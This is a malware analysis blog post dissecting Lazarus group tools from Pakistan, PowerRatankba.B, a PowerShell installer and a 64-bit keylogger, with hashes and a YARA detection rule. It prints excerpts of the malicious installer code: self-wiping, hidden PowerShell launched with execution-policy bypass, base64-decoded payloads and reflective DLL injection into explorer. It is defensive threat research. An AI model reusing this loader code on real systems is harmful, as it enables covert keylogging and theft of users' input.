Let’s Learn: Dissecting Lazarus PowerShell PowerRatankba.B, Installer Script & Keylogger: Pakistan Version

Goal: Document and review the latest Lazarus PowerRatankba.B, PowerShell installer script leading to the 64-bit keylogger version (Pakistan version).

Source:
Lazarus PowerShell PowerRatankba.B "REG_LOCALDATA.ps1"(Pakistan)
MD5: c9ed87e9f99c631cda368f6f329ee27e
Lazarus PowerShell installer script "hm.ps1" (Pakistan)
MD5: 5cc28f3f32e7274f13378a724a5ec33a
Keylogger 64-bit (x64) "capture_x64.dll'(Pakistan)
MD5: 2025D91C1CDD33DB576B2C90EF4067C7

Outline:

I. Background & Executive Summary
II. PowerShell PowerRatankba.B "REG_LOCALDATA.ps1" (Pakistan)
III. Lazarus PowerShell Installer Script  (Pakistan)
A. Main Code Flow
B. "DoProcess" Function
C. "shell_script" 
IV. Lazarus Keylogger 64-bit (x64) "capture_x64.dll'  (Pakistan)
V. Yara Signature
Analysis
I. Background & Executive Summary
This analysis is a continuation of the reporting on the recent Lazarus toolkits. It is notable that the latest discovered PowerRatankba.B toolkit, uploaded from Pakistan, is almost identical to the Chilean Redbanc incident with the slightly different hardcoded URI structure ending on “cgetpsa” and “cgetruna” on the same server, while the recent uploaded Lazarus PowerShell installer (and its keylogger) bears similarity to the ones shared by the Vietnamese CERT. It is possible that the Lazarus group was targeting financial institutions both in Chile and Pakistan while deploying the same command-and-control server and before in Vietnam.
Before diving deeper into the Lazarus PowerShell installation and keylogger analysis, I highly recommend reading the Norfolk Infosec blog titled “A Lazarus Keylogger- PSLogger” detailing the Lazarus older version of the similar script, installation, and the keylogger DLL component. As noted, the script and its installation do not contain the command-and-control protocol, which likely means that the group exfiltrates the screenshot and keylogger information at a later point via other means.
I have also uploaded MISP JSON and CSV associated with the Lazarus tools (Pakistan) to GitHub k-vitali/apt_lazarus_toolkits for detection and mitigation of this threat.
II. PowerShell PowerRatankba.B “REG_LOCALDATA.ps1” (Pakistan)
The latest identified PowerRatankba.B, uploaded from Pakistan, represents a reconnaissance Lazarus tool with the almost identical script and logic to the Chilean Redbanc incident (with the same server) with the exception of the URI structure and lack of the commented additional server.
Screen Shot 2019-02-24 at 10.34.03 PM

III. Lazarus PowerShell Installer Script “hm.ps1” (Pakistan)

A. Main Code Flow
The main function setup obtains the process list leveraging the native PowerShell command obtaining the current process id list with process names via “Get-Process | Select-Object id,name” then convert the process name to lower case and sets the boolean “$bIsInjected=$false” and then if the process name matches ‘explorer’, the malware enters “DoProcess function passing -Target_PID process id of the process, then exiting.
The main script setup is as follows:

////////////////////////////////////////////////////
////// Lazarus PowerShell installer main flow //////
////////////////////////////////////////////////////
OwnPath = $MyInvocation.MyCommand.Path;
$filesize = (Get-Item $OwnPath).length
$resetBuf = New-Object byte[] $filesize
[System.IO.File]::WriteAllBytes($OwnPath, $resetBuf)
Remove-Item -Path $OwnPath -Force -Recurse
...
$cnt_read = 0;
while($true)
{
$process_list = Get-Process | Select-Object id,name
foreach($iter in $process_list)
{
$process_name = $iter.name.ToLower();
$bIsInjected = $false;
if($process_name.CompareTo('explorer') -eq 0)
{
$ProID = $iter.Id
DoProcess -Target_PID $ProID
$ProcessListArray += $ProID
}
}
exit;
}

B. “DoProcess” Function
Essentially, the  “DoProcess” function passes the string type parameter $Target_PID and creating a file path with random characters as “C:\windows\temp\tmp[0-9A-F].ps1”.

////////////////////////////////////////////////////
///// Lazarus PowerShell 'DoProcess' Function //////
////////////////////////////////////////////////////
Function DoProcess
{
 param([String]$Target_PID)
 $szFileName = 'C:\windows\temp\tmp'+ -join ((48 .. 57) + (65 .. 70) | 
 Get-Random -Count 4 | % { [char]$_ }) + '.ps1';
 [String]$szCode = '$SScript = "' + $shell_script + '"; 
 [String]$NewStr = [System.Text.Encoding]::ASCII.GetString([System.Convert]

::FromBase64String($SScript.Replace("|","a")));$NewStr=$NewStr.Replace("EXECUTION_BINARY",
  "' + $InputString + '");$NewStr=$NewStr.Replace("PROCESSID", "' + $Target_PID + '");
  $NewBlock = [Scriptblock]::Create($NewStr);Invoke-Command -ScriptBlock $NewBlock;';
$szCode | Out-File -Encoding ascii $szFileName;
[String]$szArgList = '-ep bypass -file ' + $szFileName;
$ProID = Start-Process powershell.exe -PassThru -WindowStyle Hidden - ArgumentList $szArgList;
}

 

The malware parses “shell_script”, replaces “|” for “a”, and base64 decodes and replaces “EXECUTION_BINARY” valuew with the base64 version of the keylogger 64-bit (x64) DLL version. Additinally, it replaces “PROCESSID” with argument “$Target_PID” writing to the resulting script to the tmp file and executing it via “Start-Process powershell.exe -PassThru -WindowStyle Hidden – ArgumentList -ep bypass -file C:\windows\temp\tmp[0-9A-F].ps1”.
C. “shell_script” 
The code itself is a PowerSploit’s PowerShell “Invoke-ReflectivePEInjection” reflectively injects a DLL into a remote process decoding the DLL base64 to binary.

////////////////////////////////////////////////////
///// Lazarus PowerShell 'shell_script' Excerpt ////
////////////////////////////////////////////////////
[String]$InputString = 'EXECUTION_BINARY';
[String]$idProcess = 'PROCESSID';
$injectionErrorCode = '';
$global:cmdRes = 0;
function Invoke-ReflectivePEInjection
 Function Get-Win32Types
 Function Get-Win32Constants
 Function Get-Win32Functions
 Function Sub-SignedIntAsUnsigned
 Function Add-SignedIntAsUnsigned
 Function Compare-Val1GreaterThanVal2AsUInt
...
$PEBytes = [System.Convert]::FromBase64String($InputString);
i ( $idProcess -eq 0)
{
Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType
Void -ForceASLR;
}
else
{
Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType
Void -ForceASLR -ProcId $idProcess;
}

The malware will force the use of address space layout randomization (ASLR) on the PE loaded even if the PE indicates it does not support ASLR. Additionally, the malware passes -FuncReturnType the return type of the function being called in the DLL; the malware passes -ProcId parameter substituting $idProcess = ‘PROCESSID’ from the main flow loop code and substituting $InputString = ‘EXECTUION_BINARY’ to the dropped Lazarus 64-bit keylogger “capture_x64.dll”.
IV. Lazarus Keylogger 64-bit (x64) “capture_x64.dll’
The keylogger malware is 64-bit with the compilation timestamp Monday, September 24 09:44:33 2018 UTC. It contains the same screenshot library, export function “Process,” same XZip library as the reported Vietnamese and Pakistani keylogger with the same setup as reported in detail by Norfolk Infosec.

Screen Shot 2019-02-24 at 10.34.44 PMV. Yara Signature: Keylogger

rule apt_lazarus_keylogger
{
   meta:
      description = "Detects possible Lazarus Keylogger"
      author = "@VK_Intel"
      date = "2019-01-25"
  strings:
      $s0 = "%s%s" fullword ascii wide
      $s1 = "[ENTER]" fullword ascii wide 
      $s2 = "[EX]" fullword ascii wide
      $s3 = "%02d:%02d" fullword ascii wide
      $dll0 = "PSLogger.dll" fullword ascii wide
      $dll1 = "capture_x64.dll" fullword ascii wide
      $exe = "PSLogger.exe" fullword ascii wide
condition:
uint16(0) == 0x5a4d and all of ($s*) and (1 of ($dll*) or $exe)
}

Leave a comment